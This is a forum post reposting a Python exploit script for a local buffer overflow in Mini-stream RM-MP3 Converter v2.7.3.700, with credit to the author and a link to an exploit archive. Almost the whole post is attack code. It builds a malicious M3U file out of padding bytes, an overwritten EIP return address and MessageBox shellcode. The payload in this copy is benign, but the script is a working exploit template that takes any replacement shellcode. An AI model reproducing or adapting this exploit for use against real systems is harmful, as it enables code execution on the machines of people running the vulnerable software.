KhiZaRix Posted March 25, 2015 Report Share Posted March 25, 2015 #!/usr/bin/env python#[+] Author: TUNISIAN CYBER#[+] Exploit Title: Mini-sream RM-MP3 Converter v2.7.3.700 Local Buffer Overflow#[+] Date: 25-03-2015#[+] Type: Local Exploits#[+] Tested on: WinXp/Windows 7 Pro#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R#[+] Related Vulnerability/ies:# Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow#POC:#IMG1:#http://i.imgur.com/ESt0CH8.png#IMG2:#http://i.imgur.com/K39tpYj.pngfrom struct import packfile="crack.m3u"junk="\x41"*35032eip=pack('<I',0x7C9D30D7)junk2="\x44"*4#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore#Messagebox Shellcode (113 bytes) - Any Windows Versionshellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7")writeFile = open (file, "w")writeFile.write(junk+eip+junk2+shellcode)writeFile.close()Source: http://dl.packetstormsecurity.net/1503-exploits/ministreamrmmp3273700-overflow.txt Quote Link to comment Share on other sites More sharing options...